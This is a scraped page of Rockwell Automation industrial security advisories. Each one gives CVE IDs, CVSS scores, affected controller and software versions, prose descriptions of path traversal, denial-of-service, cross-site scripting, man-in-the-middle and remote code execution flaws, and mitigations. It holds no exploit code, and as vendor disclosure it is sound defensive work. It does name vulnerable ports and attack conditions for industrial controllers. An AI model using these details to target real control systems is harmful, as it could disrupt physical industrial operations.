Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet.
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the PN1354 - Industrial Security Advisory Index for Rockwell Automation.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (KAByrd@ra.rockwell.com).

Additional Links

Critical

PN1618 | PN1618 | ThinManager Software Path Traversal and Denial-Of-Service Attack

Published Date:

March 21, 2023

Last Updated:

September 08, 2025

CVE IDs:

CVE-2023-27855, CVE-2023-27857, CVE-2023-27856, CVE-2023-28757

Products:

ThinManager

CVSS Scores:

7.5, 9.8

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision Number

1.1

Revision History

Version 1.0 – March 21, 2023 – Initial Version

Version 1.1 - September 8, 2025 - Updated for better readability

Executive Summary

A security issue was discovered by Tenable Security Researchers and reported to Rockwell Automation. This was discovered in the ThinManager® ThinServer™ software. Successful use of this security issue could allow a threat actor to perform remote code execution on the target or crash the software.

Affected Products

ThinManager ThinServer software	Versions
	6.x – 10.x
	11.0.0 – 11.0.5
	11.1.0 – 11.1.5
	11.2.0 – 11.2.6
	12.0.0 – 12.0.4
	12.1.0 – 12.1.5
	13.0.0-13.0.1

Security Issue Details

CVE 2023-27855 ThinManager ThinServer Path Traversal Upload

CVSS Base Score: 9.8 /10 (Critical)

 CVSS 3.1 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

A path traversal exists when processing a message. An unauthenticated remote attacker could use this security issue to upload arbitrary files to any directory on the disk drive where ThinServer.exe is installed. The attacker can overwrite existing executable files with attacker-controlled, malicious content. This could cause a remote code execution.

CVE 2023-27856 ThinManager ThinServer Path Traversal Download

CVSS Base Score: 7.5 /10 (High)

 CVSS 3.1 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

A path traversal exists when processing a message of type 8 in the affected versions. An unauthenticated remote attacker can use this security issue to download arbitrary files on the disk drive where ThinServer.exe is installed.

CVE 2023-27857 ThinManager ThinServer Heap-Based Buffer Overflow

CVSS Base Score: 7.5/10 (High)

 CVSS 3.1 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

A heap-based buffer over-read condition occurs when the message field indicates more data than is present in the message field. An unauthenticated remote attacker can use this security issue to crash ThinServer.exe due to a read access violation.

Risk Mitigation & User Action

Customers should use the risk mitigations provided and combine these mitigations with the general security guidelines to use the strategies simultaneously.

CVE-2023-27855 CVE-2023-27856 CVE-2023-27857	First Known Affected	Fixed Versions
	6.x – 10.x	These versions are retired. Please update to the supported version.
	11.0.0 – 11.0.5	Update to v11.0.6
	11.1.0 – 11.1.5	Update to v11.1.6
	11.2.0 – 11.2.6	Update to v11.2.7
	12.0.0 – 12.0.4	Update to v12.0.5
	12.1.0 – 12.1.5	Update to v12.1.6
	13.0.0 – 13.0.1	Update to v13.0.2

Additional Mitigations

If customers are unable to update to the patched version, the following mitigations should be put in place:

Limiting remote access to TCP port 2031 to known thin clients and ThinManager servers would limit some access to exploit this vulnerability.

For additional security best practices, please see our Knowledgebase article, QA43240 - Recommended Security Guidelines from Rockwell Automation, to maintain your environment.

References

Glossary

Heap-Based Buffer Over-Read Condition: a type of buffer overflow flaw where the execution occurs in the heap data area. An over-read condition occurs when a program, while reading data from a buffer, overruns the buffer’s boundary and reads adjacent memory

Path Traversal: allows attackers to access files and directories that are stored outside the intended directory

Medium

PN1619 | Modbus TCP AOI Server Could Leak Sensitive Information

Published Date:

March 16, 2023

Last Updated:

October 16, 2024

CVE IDs:

CVE-2023-0027

Products:

1768/1769/5069 CompactLogix, 1756 ControlLogix

CVSS Scores (v3.1):

5.3

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Revision Number

1.1

Revision History

Version 1.0 – March 16, 2023

Verion 1.1 -September 26, 2025 - Updated for better readability

Executive Summary

Rockwell Automation received a report from researchers at Veermata Jijabai Technological Institute of a security issue. This security issue is contained within the Modbus TCP Server Add-On Instructions (AOI) for ControlLogix® and CompactLogix™ controllers. This could allow an unauthorized user to gain information when the Modbus TCP Server AOI accepts a malformed request.

Additional details relating to the discovered security issue, including affected products and recommended countermeasures, are provided in this security disclosure.

Affected Products

Modbus TCP Server Add-On Instruction (AOI) for ControlLogix and CompactLogix controllers, used to connect to other devices via Modbus TCP protocol. Rockwell Automation Sample Code Library ID:101037.
- Customers who do not use the AOI with a controller are not impacted.
- The Modbus TCP Client AOI, that is a part of this sample code library, does not have this security issue.

Security Issue Details

CVE-2023-0027 Rockwell Automation Modbus TCP Server Add-On Instruction Could Leak Sensitive Information
While the Modbus TCP Server AOI is in use, an threat actor could send a abnormal message. This woud cause the controller to respond with a copy of the most recent response to the last valid request. If used, an attacker could read the connected device’s Modbus TCP Server AOI information. It is impossible to exploit this security issue without knowing the Modbus address of the last valid request.

CVSS v3.1 Base Score: 5.3/10[medium]

 CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Risk Mitigation & User Action

Customers using the products should use the following mitigations and apply them to their deployed products.

Products Affected	First Known Version Affected	Corrected In
Modbus TCP Add-On Instructions (AOI) Sample Code	2.00.00	This issue has been mitigated in the following AOI versions: 2.04.00 and later

General Security Guidelines

General security guidelines can be found in QA43240 - Recommended Security Guidelines from Rockwell Automation.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

Additional Links

Disclaimer

This document is intended to provide general technical information on a particular subject or subjects and is not an exhaustive treatment of such subjects. Accordingly, the information in this document is not intended to constitute application, design, software or other professional engineering advice or services. Before making any decision or taking any action, which might affect your equipment, you should consult a qualified professional advisor.

ROCKWELL AUTOMATION DOES NOT WARRANT THE COMPLETENESS, TIMELINESS OR ACCURACY OF ANY OF THE DATA CONTAINED IN THIS DOCUMENT AND MAY MAKE CHANGES THERETO AT ANY TIME IN ITS SOLE DISCRETION WITHOUT NOTICE. FURTHER, ALL INFORMATION CONVEYED HEREBY IS PROVIDED TO USERS "AS IS." IN NO EVENT SHALL ROCKWELL AUTOMATION BE LIABLE FOR ANY DAMAGES OF ANY KIND INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOST PROFIT OR DAMAGE, EVEN IF ROCKWELL AUTOMATION HAS BEEN ADVISED OFTHE POSSIBILITY OF SUCH DAMAGES.

ROCKWELL AUTOMATION DISCLAIMS ALL WARRANTIES WHETHER EXPRESSED OR IMPLIED IN RESPECT OF THE INFORMATION (INCLUDING SOFTWARE) PROVIDED HEREBY, INCLUDING THE IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, AND NON-INFRINGEMENT. NOTE THAT CERTAIN JURISDICTIONS DO NOT COUNTENANCE THE EXCLUSION OF IMPLIED WARRANTIES; THUS, THIS DISCLAIMER MAY NOT APPLY TO YOU.

Medium

PN1554 | PN1554 | CompactLogix 5370 and ControlLogix 5570 Controllers Vulnerable to Denial of Service Conditions due to Improper Input Validation

Published Date:

February 07, 2023

Last Updated:

February 07, 2023

CVE IDs:

CVE-2020-6998

Products:

1769 Compact GuardLogix 5370, 1769 CompactLogix 5370

CVSS Scores:

5.8

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.2

Revision History

Version 1.0 – March 2, 2021. Initial Release
Version 1.2 – February 7, 2023 - Updated affected products and risk mitigations section

Executive Summary

CompactLogix™ 5370 and ControlLogix^® 5570 Programmable Automation Controllers (PACs) contain a vulnerability in the connection establishment algorithm that could allow a remote, unauthenticated attacker to cause infinite wait times in communications with other products resulting in denial of service conditions. The Cybersecurity & Infrastructure Security Agency (CISA) reported this vulnerability to Rockwell Automation by way of an anonymous researcher.

Customers using the affected products are strongly encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products.

Affected Products

The following products are affected:

CompactLogix 5370
Compact GuardLogix 5370
ControlLogix 5570
ControlLogix 5570 redundancy
GuardLogix 5570

Vulnerability Details

CVE-2020-6998: Improper Input Validation Causes Denial of Service Condition
The connection establishment algorithm found in CompactLogix 5370 and ControlLogix 5570 does not sufficiently manage its control flow during execution, creating an infinite loop. This may allow an attacker to send specially crafted CIP™ packet requests to a controller, which may cause denial of service conditions in communications with other products.

CVSS v3.1 Base Score: 5.8/10 [MEDIUM]
 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L

Risk Mitigation & User Action

Customers using the affected products are encouraged to update to an available firmware version that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

CVE-2020-6998

Products Affected	First Known Version Affected	Corrected In
CompactLogix 5370 ControlLogix 5570 GuardLogix 5570	20.011	33.011 and later
Compact GuardLogix 5370	28.011	33.011 and later
ControlLogix 5570 Redundancy	20.054	33.051 and later

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products

Consult the product documentation for specific features, such as a hardware mode switch setting, to which may be used to block unauthorized changes, etc.
Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.

General Mitigations

Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

Critical

PN1616 | PN1616 | CVE-2019-5096 and CVE 2019-5097 Vulnerabilities Impact Multiple Products

Published Date:

January 27, 2023

Last Updated:

September 08, 2025

CVE IDs:

CVE-2019-5097, CVE-2019-5096

Products:

1768/1769/5069 CompactLogix, 1769 Compact I/O, 1732E ArmorBlock I/O, 1756 ControlLogix, 1769 CompactLogix Controllers, 1747 SLC 500, 1756/1769/5069/2080 Chassis-based I/O, 1769 Compact GuardLogix 5370, 1756/5069 GuardLogix

CVSS Scores:

7.5, 9.8

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Version

1.1

Revision History

Version 1.0 – January 27, 2023

Version 1.1 - September 8, 2025

Executive Summary

Rockwell Automation is aware of multiple products that use the GoAhead web server application that are affected by CVE 2019-5096 and CVE 2019-5097. These security issues could potentially have a high impact on the confidentiality, integrity and availability of the vulnerable devices. We have not received any notice of these security issues being usedin Rockwell Automation products.

Customers using the affected products should use the mitigations provided below. Additional details relating to the discovered scurity issues, including impact and recommended countermeasures are below.

Affected Products

CVE -2019-5096 and CVE 2019-5097

Catalog Number	Firmware Version
1732E-8CFGM8R/A	1.012
1732E-IF4M12R/A (discontinued)	1.012
1732E-IR4IM12R/A	1.012
1732E-IT4IM12R/A	1.012
1732E-OF4M12R/A	1.012
1732E-OB8M8SR/A	1.013
1732E-IB8M8SOER	1.012
1732E-8IOLM12R	2.011
1747-AENTR	2.002
1769-AENTR	1.001
5069-AEN2TR	3.011
1756-EN2TR/C	<=11.001
1756-EN2T/D	<=11.001
1756-EN2TSC/B (discontinued)	10.01
1756-EN2TSC/B	10.01
1756-HIST1G/A (discontinued)	<=3.054
1756-HIST2G/A(discontinued)	<=3.054
1756-HIST2G/B	<=5.103

CVE 2019 -5097

Catalog Number	Firmware Version
ControlLogix® 5580 controllers	V28 – V32*
GuardLogix® 5580 controllers	V31 – V32*
CompactLogix™ 5380 controllers	V28 – V32*
Compact GuardLogix 5380 controllers	V31 – V32*
CompactLogix 5480 controllers	V32*
1756-EN2T/D	11.001*
1756-EN2TR/C	11.001*
1765–EN3TR/B	11.001*
1756-EN2F/C	11.001*
1756-EN2TP/A	11.001*

* The security issue is only usable via the Ethernet port. It is not useable via backplane or USB communications.

Security Issue Details

Rockwell Automation was made aware of two third-party security issues that affect the GoAhead embedded web server. A critical security issue (CVE-2019-5096) exists in the way requests are processed by the web server. A threat actor could use this to execute arbitrary code by sending specially crafted HTTP requests to the targeted device.

Additionally, a denial-of-service (DoS) vulnerability (CVE-2019 5097) exists in the GoAhead web server. To use this security issue, a threat actor would have to send specially crafted HTTP requests. This would trigger an infinite loop in the process and the targeted device could then crash.

CVE 2019-5096 EmbedThis GoAhead web server code execution vulnerability

CVSS Base Score:  9.8/10 (Critical) 

 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE 2019-5097 EmbedThis GoAhead web server denial-of-service vulnerability

CVSS Base Score:  7.5/10 (High) 

 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Risk Mitigation & User Action

Customers should use the below mitigations.

Product	Suggested Actions
1732E-8CFGM8R/A	Refer to Additional Mitigations
1732E-IF4M12R/A	Refer to Additional Mitigations
1732E-IR4IM12R/A	Refer to Additional Mitigations
1732E-IT4IM12R/A	Refer to Additional Mitigations
1732E-OF4M12R/A	Refer to Additional Mitigations
1732E-OB8M8SR/A	Refer to Additional Mitigations
1732E-IB8M8SOER	Refer to Additional Mitigations
1732E-8IOLM12R	Refer to Additional Mitigations
1747-AENTR	Refer to Additional Mitigations
1769-AENTR	Update to 1.003 or later
5069-AEN2TR (discontinued)	Migrate to the 5069-AENTR
1756-EN2T/D	Update to 11.002 or later
1756-EN2TR/C	Update to 11.002 or later
1756-EN3TR/B	Update to 11.002 or later
1756-EN2F/C	Update to 11.002 or later
1756-EN2TP/A	Update to 11.002 or later
1756-EN2TSC/B	Refer to Additional Mitigations
1756-HIST1G/A (discontinued)	Update to series B v5.104 or C 7.100 or later
1756-HIST2G/A (discontinued)	Update to series B v5.104 or C 7.100 or later
1756-HIST2G/B	Update to 5.104 or later
1756-EN2F/C	Update to 11.002 or later
ControlLogix 5580 controllers	Update to V32.016 or later
GuardLogix 5580 controllers	Update to V32.016 or later
CompactLogix 5380 controllers	Update to V32.016 or later
Compact GuardLogix 5380 controllers	Update to V32.016 or later
CompactLogix 5480	Update to V32.016 or later

Additional Mitigations

If updating firmware is not possible or unavailable, customers should use the mitigations to help minimize risks.

Disable the web server, if possible. Review the product user manual for instructions, which can be found in the Rockwell Automation Literature Library.
- For 1732E, upgrade to the latest firmware to disable the web server.
Configure firewalls to not allow network communication through HTTP/Port 80.

Please see our Knowledgebase article, QA43240 - Recommended Security Guidelines from Rockwell Automation, for more recommendations about maintaining your environment.

References

Glossary

Denial-of-Service: malicious attempt to overwhelm a web property with traffic in order to disrupt its normal operations

HTTP Requests: (Hypertext Transfer Protocol) primarily used to fetch resources such as HTML documents, images, videos, and scripts. When a user requests a web page, the browser sends an HTTP request to the server, which then responds with the requested resource

High

PN1613 | PN1613 | Product Notice 1613: Logix Controllers Vulnerable to a Denial-of-Service Vulnerability

Published Date:

January 25, 2023

Last Updated:

September 08, 2025

CVE IDs:

CVE-2022-3157

Products:

1756-L71S, Standard Controllers, 1756-L72S, 1756-L73S, 1769 CompactLogix 5370

CVSS Scores:

8.6

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.2

Revision History

Version 1.0 – December 15, 2022
Version 1.1 – January 17, 2022 – Updated risk mitigation section
Version 1.2 – January 25, 2023 – Updated risk mitigation section

Version 1.3 - September 8. 2025 - Updated for readability

Executive Summary

Rockwell Automation was made aware of a denial-of-service security issue that impacts several versions of our GuardLogix^® and ControlLogix^® controllers. Use of this security issue could lead to a breakdown in availability of the controller and/or a major non-recoverable fault (MNRF).

Customers using affected software versions should use the mitigations in this disclosure. Additional details relating to the discovered security issue, including the products in scope, impact, and recommended countermeasures, are below. We have not received any notice of this security issue being used in Rockwell Automation products.

Affected Products

CompactLogix™ 5370
Compact GuardLogix 5370
ControlLogix 5570
ControlLogix 5570 redundancy
GuardLogix 5570

Security Issue Details

CVE-2022-3157 Controllers vulnerable to Denial-of-Service Condition
A security issue exists in the Rockwell Automation controllers. It allows a malformed CIP™ request to cause a (MNRF) and a denial-of-service condition (DOS).

CVSS Base Score:  8.6/10 (High) 

 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Risk Mitigation & User Action

This security issue has been addressed in newer versions of the products. Customers should use risk mitigations below and combine them with QA43240 - Recommended Security Guidelines from Rockwell Automation to employ multiple strategies simultaneously.

Products Affected	First Known Version Affected	Corrected In
CompactLogix 5370 ControlLogix 5570 GuardLogix 5570	20.011	33.013 34.011 and later
Compact GuardLogix 5370	28.011	33.013 34.011 and later
ControlLogix 5570 Redundancy	20.054	33.052 34.051 and later

Reference

CVE-2022-3157

Glossary

Denial-of-Service: malicious attempt to overwhelm a web property with traffic in order to disrupt its normal operations

Major Nonrecoverable Fault (MNRF): an error that occurs in a system or device and prevents it from recovering or functioning properly

High

PN1614 | PN1614 | Studio 5000 Logix Emulate Vulnerable to a SMB Insecurely Configuration Vulnerability

Published Date:

December 22, 2022

Last Updated:

December 22, 2022

CVE IDs:

CVE-2022-3156

Products:

RSLogix Emulate 5000 / Studio 5000 Logix Emulate

CVSS Scores:

7.8

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 – December 22, 2022

Executive Summary

Rockwell Automation was made aware of a misconfiguration vulnerability that affects Studio 5000® Logix Emulate™. Exploitation of this vulnerability could potentially allow a malicious user to perform a remote code execution that could impact the confidentiality, integrity and availability of the software.

Customers using affected versions of this software are encouraged to evaluate the following mitigations and apply them where appropriate. Additional details relating to the discovered vulnerability, including the products in scope, impact and recommended countermeasures, are provided. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Affected Products

Studio 5000 Logix Emulate v.20 – 33

Vulnerability Details

CVE-2022-3156 Studio 5000 Logix Emulate SMB™ misconfiguration vulnerability
Users are granted elevated permissions on select product services. Due to this misconfiguration, a malicious user could potentially achieve remote code execution on the targeted software.

CVSS Base Score:  7.8/10 (High)
 CVSS:3.1/ AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Risk Mitigation & User Action

This vulnerability has been addressed in newer versions of the products. Customers are also directed towards the risk mitigations provided and are encouraged, when possible, to combine these with QA43240 - Recommended Security Guidelines from Rockwell Automation to employ multiple strategies simultaneously.

Vulnerabilities	Product	Suggested Actions
CVE-2022-3156	Studio 5000 Logix Emulate	Customers should upgrade to version 34.00 or later to mitigate this issue.

References

High

PN1611 | MicroLogix 1100 and 1400 Product Web Server Application Vulnerable to Denial-Of-Service Condition Attack

Published Date:

December 13, 2022

Last Updated:

October 16, 2024

Products:

1763 MicroLogix 1100, 1766 MicroLogix 1400

CVSS Scores (v3.1):

7.5

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

Yes

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 – December 13, 2022

Executive Summary

Rockwell Automation received a vulnerability report from security researchers at Veermata Jijabai Technological Institute (VJTI). If exploited, this vulnerability could cause a denial-of-service condition in the web server application on the targeted device.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply them where appropriate. Additional details relating to the discovered vulnerability, including the products in scope, impact, and recommended countermeasures, are provided below. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Affected Products

MicroLogix™ 1400 B/C v. 21.007 and below
MicroLogix™ 1400 A v. 7.000 and below
MicroLogix™ 1100 all versions

Vulnerability Details

Rockwell Automation was made aware that the webserver of the Micrologix-1400 B PLC contains a vulnerability that may lead to a denial-of-service condition. The security vulnerability could be exploited by an attacker with network access to the affected systems by sending TCP packets to webserver and closing it abruptly which would cause a denial-of-service condition for the web server application on the device.

(CVE 2022-3166) MicroLogix Controllers Vulnerable to Clickjacking Attack

CVSS Base Score: 7.5 /10 (High)

 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the affected software are encouraged to implement the risk mitigations below to minimize the risk of vulnerability. Additionally, we encourage customers to combine the risk mitigations with security best practices, also provided below, to deploy a defense-in-depth strategy.

Disable the web server, if possible (This component is an optional feature and disabling it will not disrupt the intended use of the device)
Configure firewalls to disallow network communication through HTTP/Port 80
Upgrade to the MicroLogix 800 or MicroLogix 850 as this device does not have the web server component

If applying the mitigations noted above are not possible, please see our Knowledgebase article QA43240 - Security Best Practices, for additional recommendations to maintain the security posture of your environment.

Additional Resources

CVE-2022-3166 JSON

High

PN1612 | MicroLogix 1100 and 1400 Web Server Application Vulnerable to Cross Site Scripting Attack

Published Date:

December 13, 2022

Last Updated:

October 16, 2024

Products:

1763 MicroLogix 1100, 1766 MicroLogix 1400

CVSS Scores (v3.1):

8.2

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

Yes

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 – December 13, 2022

Executive Summary

Rockwell Automation received a vulnerability report from a security researcher from Georgia Institute of Technology. If exploited, this vulnerability could allow an attacker to submit remote code in the web server application on the targeted device.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply them where appropriate. Additional details relating to the discovered vulnerability, including the products in scope, impact, and recommended countermeasures, are provided below. We have not received any notice of this vulnerability previously being exploited in Rockwell Automation products.

Affected Products

MicroLogix™ 1400 B/C v. 21.007 and below
MicroLogix™ 1400 A v. 7.000 and below
MicroLogix™ 1100 all versions

Vulnerability Details

Rockwell Automation was made aware that the MicroLogix 1100 and 1400 controllers contain a vulnerability that may give an attacker the ability to accomplish remote code execution. The vulnerability is an unauthenticated stored cross-site scripting vulnerability in the embedded webserver. The payload is transferred to the controller over SNMP and is rendered on the homepage of the embedded website.

(CVE 2022-46670) MicroLogix Controllers Vulnerable to Cross-Site Scripting Attack

CVSS Base Score: 8.2 /10 (High)

 CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Risk Mitigation & User Action

Customers using the affected software are encouraged to implement the risk mitigations below to minimize the risk of vulnerability. Additionally, we encourage customers to combine the risk mitigations with security best practices, also provided below, to deploy a defense-in-depth strategy.

Disable the web server, if possible (This component is an optional feature and disabling it will not disrupt the intended use of the device).
Configure firewalls to disallow network communication through HTTP/Port 80
Upgrade to the Micro800 family as this device does not have the web server component.

If applying the mitigations noted above are not possible, please see our Knowledgebase article QA43240 - Security Best Practices, for additional recommendations to maintain the security posture of your environment.

Additional Resources

CVE-2022-46670 JSON

High

PN1609 | Logix Controllers Vulnerable to Denial-of-Service Attack

Published Date:

December 06, 2022

Last Updated:

October 16, 2024

CVE IDs:

CVE-2022-3752

Products:

1756-L83ES, Standard Controllers, 1756-L84ES, 1756-L81ES, 5069 CompactLogix, 1756-L82ES, 5069 Compact GuardLogix 5380

CVSS Scores (v3.1):

8.6

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 – December 6, 2022

Executive Summary

Rockwell Automation discovered a vulnerability within our Logix Controllers. This vulnerability may allow an unauthorized user to cause a denial of service on a targeted device. Customers using affected versions of this firmware are encouraged to evaluate the following mitigations provided and apply them to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided in this security advisory.

Affected Products

CompactLogix 5380 controllers
Compact GuardLogix® 5380 controllers
CompactLogix 5480 controllers
ControlLogix 5580 controllers
GuardLogix 5580 controllers

Vulnerability Details

CVE-2022-3752 Rockwell Automation Logix Controllers are Vulnerable to a Denial-of-Service Attack
An unauthorized user could use a specially crafted sequence of Ethernet/IP messages, combined with heavy traffic loading to cause a denial-of-service condition resulting in a major non-recoverable fault. If the target device becomes unavailable, a user would have to clear the fault and redownload the user project file to bring the device back online and continue normal operation.

CVSS v3.1 Base Score: 8.6/10[HIGH]

 CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the products in scope are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products.

Products Affected	First Known Version Affected	Corrected In
CompactLogix 5380 Compact GuardLogix 5380 ControlLogix 5580 GuardLogix 5580	This vulnerability is present in firmware version 31.011 and later	This issue has been mitigated in the following firmware versions: 32.016 and later for versions 32 33.015 and later for versions 33 34.011 and later Customers should upgrade to a version listed above to mitigate this vulnerability
CompactLogix 5480	This vulnerability is present in firmware version 32.011 and later

General Security Guidelines

General security guidelines can be found in QA43240 - Recommended Security Guidelines Article in our Knowledgebase.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

ADDITIONAL LINKS

Medium

PN1608 | FactoryTalk Live Data Communication Module Vulnerable to Man-In-The-Middle Attack

Published Date:

December 01, 2022

Last Updated:

October 16, 2024

Products:

LiveData

CVSS Scores (v3.1):

5.9

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

Yes

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 – December 1, 2022

Executive Summary

Rockwell Automation received a report from Guidepoint Security regarding a security vulnerability discovered within the FactoryTalk® Live Data Communication Module contained within the FactoryTalk Services Platform. Due to the use of a cleartext protocol in this module, malicious actors could conduct Address Resolution Protocol spoofing resulting in loss of integrity of the traffic. This could allow the attacker to view and modify unauthorized packets and potentially deceive the user into seeing false data on the human machine interface.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the issue, including affected products and recommended countermeasures, are provided.

Affected Products

FactoryTalk LiveData Communication Module (Contained within FactoryTalk Services Platform) - All versions

Vulnerability Details

FactoryTalk LiveData Communication Module vulnerable to man-in-the-middle attack
An unauthenticated attacker with network access can accomplish a man-in-the-middle attack utilizing the clear text protocol of the FactoryTalk LiveData Communication Module and modify traffic leading to a complete loss of integrity for the products affected by the vulnerability. This condition could result in the operator at the human machine interface seeing manipulated data on the screen potentially breaking the integrity of the data that is seen.

CVSS v3.1 Base Score: 5.9/10[MEDIUM]

 CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N

Risk Mitigation & User Action

Customers using the affected software are encouraged to setup the secondary mitigation as described below that addresses the associated risk. Customers are also directed towards general risk mitigation strategies provided in the QA43240 - Recommended Security Guidelines from Rockwell Automation in our Knowledgebase.

Suggested Actions

Customers should setup IPsec to mitigate this issue as detailed in the QA46277 - Deploying FactoryTalk Software with IPsec Knowledgebase article.

General Security Guidelines

If customers are unable to implement IPsec, it is recommended that the below guidelines be adhered to as they provide strong mitigations against this type of attack.

Network-based Vulnerability Mitigations for Embedded Products

Utilize proper network infrastructure controls to help ensure that unused or unnecessary protocols from unauthorized sources are blocked. For more information on TCP/UDP ports and protocols used by Rockwell Automation Products, see Knowledgebase Article BF7490 - TCPUDP Ports Used by Rockwell Automation Products.
Locate control system networks and devices behind firewalls and isolate them from the business network.
Consult the product documentation for specific features, (e.g. hardware keyswitch settings) which may be used to block unauthorized changes, etc.
Block all traffic to EtherNet/IP or other CIP protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances.

General security guidelines can be found in the QA43240 - Recommended Security Guidelines from Rockwell Automation in our Knowledgebase.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

Additional Links

PN1354 - Industrial Security Advisory Index

Critical

PN1576 | PN1576 | FactoryTalk® Activation Manager and Studio 5000 Logix Designer® contain Wibu Codemeter vulnerabilities.

Published Date:

November 17, 2022

Last Updated:

November 17, 2022

CVE IDs:

CVE-2021-20094, CVE-2021-20093, CVE-2021-41057

Products:

FactoryTalk Activation, RSLogix 5000 / Studio 5000 Logix Designer

CVSS Scores:

7.5, 9.1

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 – August 6, 2021

Revision History

Revision Number

2.0

Revision History

Version 2.0 - August 11, 2021 – Removed modified score

Revision History

Revision Number

3.0

Revision History

Version 3.0 – November 22, 2022

Executive Summary

